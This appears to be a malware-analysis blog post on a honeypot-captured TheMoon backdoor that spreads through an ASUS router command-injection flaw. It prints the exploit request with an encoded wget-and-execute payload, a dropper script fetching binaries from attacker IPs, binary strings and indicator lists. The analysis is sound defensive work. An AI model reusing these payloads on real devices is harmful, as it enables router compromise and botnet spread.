New Linux Backdoor found in the wild TheMoon family of malware ASUS Router NTTPD Vulnerability

By | March 15, 2017

New Linux Backdoor found in the wild on one of our honeypots – This bot belongs to the TheMoon family of malware

The vulnerable ASUS router will  download and execute the binary file .nttpd from the attacker controlled website.

POST /hndUnblock.cgi HTTP/1.0
\r\nAccept: */*\r\n
Host: 81.171.12.232\r\n
User-Agent: Wget(linux)\r\n
Content-Length: 414\r\n
Content-Type: application/x-www-form-urlencoded

submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%66%6C%6F%77%65%72%74%6F%77%65%72%73%62%6C%61%62%6C%61%2E%74%6F%70%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1'

https://virustotal.com/en/file/b963223d3f39884ebed3e647390e55d8de86c7e3c5daaae6509379a6fc3ba97e/analysis/1489518585/

Antivirus Result Update
AegisLab Backdoor.Linux.Agent!c 20170314
Antiy-AVL Trojan[Backdoor]/Linux.Agent.y 20170314
Avast ELF:Agent-HL [Trj] 20170314
AVG Linux/Proxy 20170314
Avira (no cloud) LINUX/Proxy.dpqur 20170314
ClamAV Unix.Malware.Agent-5752588-0 20170314
Comodo UnclassifiedMalware 20170314
Cyren ELF/Trojan.LBPI-2 20170314
DrWeb Linux.Themoon.4 20170314
ESET-NOD32 a variant of Linux/Proxy.Agent.B 20170314
GData Linux.Trojan.Agent.U7SNIQ 20170314
Ikarus Trojan.Linux.Proxy 20170314
Jiangmin Backdoor.Linux.mry 20170314
Kaspersky HEUR:Backdoor.Linux.Agent.y 20170314
Qihoo-360 Win32/Backdoor.4d2 20170314
Sophos Linux/Backdr-KZ 20170314
Symantec Trojan.Gen.NPE 20170314
Tencent Linux.Backdoor.Agent.Sxxp 20170314
ZoneAlarm by Check Point HEUR:Backdoor.Linux.Agent.y 20170314

 

Filename Size MD5 ClamAV
.nttpd,17-mips-be-t2 47164 c0c1d535d5f76c5a69ad6421ff6209fb Unix.Malware.Agent-5752588-0 FOUND
.nttpd,18-arm-le-t1 30851 4d90e3a14ebb282bcdf3095e377c8d26
nttpd,19-mips-le-t1 50156 11f060ffd8a87f824c1df3063560bc9e Unix.Malware.Agent-1696027 FOUND

root@wittyserver:~/malware/20170314# cat nmbt2.sh
#!/bin/sh

cd /tmp

rm -f .nttpd
wget -O .nttpd hxxp://208.110.66.154/.nttpd,17-mips-be-t2
chmod +x .nttpd
./.nttpd

rm -f nmlt1.sh
wget -O nmlt1.sh hxxp://208.110.66.154/nmlt1.sh
chmod +x nmlt1.sh
./nmlt1.sh

 

Binary strings from .nttpd,17-mips-be-t2

 

memory allication failed
%d,%d
.nttpd.pid
ps | grep .nttpd > .nttpd.ps
.nttpd.ps
.nttpd
-I
INPUT -p udp –dport %u -j ACCEPT
-D
.pid
%s,%d
./%s &
INPUT -p tcp -m multiport –dport 80,8080,7547 -j DROP
INPUT -s 46.148.18.0/24 -j ACCEPT
INPUT -s 185.56.30.0/24 -j ACCEPT
INPUT -s 217.79.182.0/24 -j ACCEPT
INPUT -s 85.114.135.0/24 -j ACCEPT
INPUT -s 95.213.143.0/24 -j ACCEPT
INPUT -s 185.53.8.0/24 -j ACCEPT
-I
-D
reboot
@UX/proc/meminfo
MemTotal: %d kB
MemFree: %d kB
/etc/resolv.conf
memory allication failed
/dev/urandom
__fork
/dev/null
/proc/%d
kill %d
kill -9 %d
killall -9 %s
iptables
/proc/net/route
%x%x
GCC: (GNU) 3.3.2
GCC: (Buildroot 2014.08-git-00414-g1f3669b) 4.8.3

https://virustotal.com/en/file/2644d5706528dc0188be573cc722f0dc67ecf69b374f3d0c0158aeae2a6fab92/analysis/1489515563/

https://virustotal.com/en/file/b963223d3f39884ebed3e647390e55d8de86c7e3c5daaae6509379a6fc3ba97e/analysis/1489518585/

root@wittyserver:~/malware/20170314# cat nmbt2.sh
#!/bin/sh

cd /tmp

rm -f .nttpd
wget -O .nttpd hxxp://208.110.66.154/.nttpd,17-mips-be-t2
chmod +x .nttpd
./.nttpd

rm -f nmlt1.sh
wget -O nmlt1.sh hxxp://208.110.66.154/nmlt1.sh
chmod +x nmlt1.sh
./nmlt1.sh

 

 

Other discovered backdoor file download locations:

{“data”:{“d45a24dfe5167f0945187394333f9571”:{“filename”:”d45a24dfe5167f0945187394333f9571″,”mime”:”text\/x-php”,”url”:”ftp:\/\/69.164.212.68\/lol.php”,”size”:15091,”ts”:”15\/03\/2017 03:23:34″},”015b16e21f2f4db6d7f02b63378a20dd”:{“filename”:”015b16e21f2f4db6d7f02b63378a20dd”,”mime”:”text\/x-perl”,”url”:”http:\/\/212.154.211.81\/maxx.txt”,”size”:7478,”ts”:”15\/03\/2017 01:09:23″},”d12abe314fda7ee7bb3533eae5bf9ee7″:{“filename”:”d12abe314fda7ee7bb3533eae5bf9ee7″,”mime”:”text\/x-php”,”url”:”ftp:\/\/208.67.1.42\/pub\/kok.php”,”size”:14977,”ts”:”14\/03\/2017 23:16:41″},”72488a6ab8a3fd7a5600bb2b4f739eeb”:{“filename”:”72488a6ab8a3fd7a5600bb2b4f739eeb”,”mime”:”text\/x-php”,”url”:”ftp:\/\/46.166.185.82\/pub\/jahf.php”,”size”:38215,”ts”:”14\/03\/2017 22:09:31″},”702b9a56c0e468b877e49cf1057628db”:{“filename”:”702b9a56c0e468b877e49cf1057628db”,”mime”:”text\/x-php”,”url”:”ftp:\/\/107.178.96.21\/pub\/pma.php”,”size”:18204,”ts”:”14\/03\/2017 21:49:03″},”81b269c553782cd7e9693cb59556c552″:{“filename”:”81b269c553782cd7e9693cb59556c552″,”mime”:”text\/x-php”,”url”:”ftp:\/\/176.31.14.152\/pbot.php”,”size”:38200,”ts”:”14\/03\/2017 21:02:10″},”4a0a754bc091caa6e9a8c636b8b1cb79″:{“filename”:”4a0a754bc091caa6e9a8c636b8b1cb79″,”mime”:”text\/x-php”,”url”:”ftp:\/\/172.245.62.50\/bot.php”,”size”:15091,”ts”:”14\/03\/2017 20:54:09″},”f22bdaad1a2f841bc9d4b3d09d09d06a”:{“filename”:”f22bdaad1a2f841bc9d4b3d09d09d06a”,”mime”:”text\/plain”,”url”:”http:\/\/webshell.jexboss.net\/jsp_version.txt”,”size”:16,”ts”:”14\/03\/2017 17:07:00″},”e6408aa9db0a1e09c8028f87d3a8f0cf”:{“filename”:”e6408aa9db0a1e09c8028f87d3a8f0cf”,”mime”:”application\/x-executable”,”url”:”http:\/\/180.150.226.202:8087\/ssl”,”size”:1223123,”ts”:”14\/03\/2017 11:18:34″},”2b5cb867fa672ccb435c0d59be62d8d3″:{“filename”:”2b5cb867fa672ccb435c0d59be62d8d3″,”mime”:”text\/x-php”,”url”:”ftp:\/\/irc-freekodak.ml\/pub\/php_config_modemized.php”,”size”:38208,”ts”:”14\/03\/2017 04:16:47″},”a519c5752c6132d5f3b02e6a249752a0″:{“filename”:”a519c5752c6132d5f3b02e6a249752a0″,”mime”:”text\/x-perl”,”url”:”http:\/\/87.106.245.51\/.jb”,”size”:26687,”ts”:”13\/03\/2017 21:59:59″},”6a3f9d9b40432b3ad1e155b68ba5d23c”:{“filename”:”6a3f9d9b40432b3ad1e155b68ba5d23c”,”mime”:”text\/x-php”,”url”:”ftp:\/\/162.243.163.246\/bot.php”,”size”:42857,”ts”:”13\/03\/2017 18:34:49″},”c448db5232105a21956b5eac1f9918d8″:{“filename”:”c448db5232105a21956b5eac1f9918d8″,”mime”:”text\/x-perl”,”url”:”http:\/\/87.106.245.51\/.jb”,”size”:26688,”ts”:”13\/03\/2017 05:40:52″},”c1596f2fb56fcb7599a235b8964e91bc”:{“filename”:”c1596f2fb56fcb7599a235b8964e91bc”,”mime”:”text\/x-perl”,”url”:”http:\/\/46.101.210.240\/n2″,”size”:33365,”ts”:”12\/03\/2017 17:51:33″},”80b80c28511f571441357e9244601a4b”:{“filename”:”80b80c28511f571441357e9244601a4b”,”mime”:”application\/x-executable”,”url”:”http:\/\/180.150.226.202:8087\/link”,”size”:1223123,”ts”:”12\/03\/2017 13:37:30″},”d470b1decd8ea67fb0fe3a23c2eeeb2f”:{“filename”:”d470b1decd8ea67fb0fe3a23c2eeeb2f”,”mime”:”text\/x-php”,”url”:”ftp:\/\/185.61.138.156\/bot2″,”size”:38423,”ts”:”12\/03\/2017 13:06:46″},”d76604ac60dec4779d981aaf9ecd0a88″:{“filename”:”d76604ac60dec4779d981aaf9ecd0a88″,”mime”:”text\/x-php”,”url”:”ftp:\/\/185.29.11.206\/bot.php”,”size”:42657,”ts”:”12\/03\/2017 04:45:24″},”adfc248077d7866e44e9718dae3752d3″:{“filename”:”adfc248077d7866e44e9718dae3752d3″,”mime”:”text\/x-php”,”url”:”ftp:\/\/208.67.1.42\/pub\/kok.php”,”size”:14976,”ts”:”12\/03\/2017 03:36:21″},”8b038a436d36eb9fe5d75d598f0ad17d”:{“filename”:”8b038a436d36eb9fe5d75d598f0ad17d”,”mime”:”text\/x-shellscript”,”url”:”http:\/\/flowertowersblabla.top\/nmlt1.sh”,”size”:333,”ts”:”11\/03\/2017 23:12:39″},”4d90e3a14ebb282bcdf3095e377c8d26″:{“filename”:”4d90e3a14ebb282bcdf3095e377c8d26″,”mime”:”application\/x-executable”,”url”:”http:\/\/flowertowersblabla.top\/.nttpd,18-arm-le-t1″,”size”:30851,”ts”:”11\/03\/2017 23:12:39″}},”status”:0}

Share Button

Leave a Reply

Your email address will not be published. Required fields are marked *